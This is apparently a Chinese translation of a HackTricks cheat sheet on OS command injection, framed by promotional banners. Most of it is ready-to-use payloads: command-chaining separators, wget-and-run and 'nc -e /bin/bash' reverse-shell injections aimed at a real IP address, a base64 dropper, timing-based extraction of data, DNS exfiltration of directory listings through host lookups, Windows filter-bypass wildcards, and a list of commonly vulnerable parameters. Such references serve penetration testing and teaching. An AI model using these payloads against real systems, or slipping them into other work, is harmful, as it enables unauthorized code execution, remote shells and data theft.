8.5 KiB
命令注入
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
使用Trickest可以轻松构建和自动化工作流程,使用全球最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
什么是命令注入?
操作系统命令注入(也称为shell注入)是一种Web安全漏洞,允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,并通常完全破坏应用程序及其所有数据。(来自这里)。
上下文
根据你的输入被注入的位置,你可能需要在命令之前终止引用的上下文(使用"或')。
命令注入/执行
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
绕过限制
如果你想在Linux机器上执行任意命令,你会对以下绕过方法感兴趣:
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}
示例
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
参数
以下是可能受到代码注入和类似远程命令执行(RCE)漏洞影响的前25个参数(来自链接):
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
基于时间的数据泄露
逐个字符提取数据
$ time if [ $(id | grep -c "root") -eq 1 ]; then sleep 5; fi
This technique involves extracting data from a command injection vulnerability one character at a time. By using the time command, we can measure the execution time of a command and determine if a specific condition is met. In the example above, we are checking if the output of the id command contains the string "root". If it does, we introduce a delay of 5 seconds using the sleep command.
By observing the response time of the injected command, an attacker can determine if the condition is true or false. This allows them to extract data character by character, as each character can be checked individually.
This technique can be useful when the output of the injected command is not directly visible to the attacker, but the response time can be observed. It can be used to extract sensitive information such as passwords or database contents. However, it requires patience and can be time-consuming, as each character must be extracted separately.
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
基于DNS的数据泄露
基于https://github.com/HoLyVieR/dnsbin上的工具,也托管在dnsbin.zhack.ca上。
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
在线工具检查基于DNS的数据泄露:
- dnsbin.zhack.ca
- pingb.in
绕过过滤
Windows
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
Linux
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}
暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
参考资料
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" %}
{% embed url="https://portswigger.net/web-security/os-command-injection" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks的衣物
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
使用Trickest可以轻松构建和自动化工作流程,使用全球最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}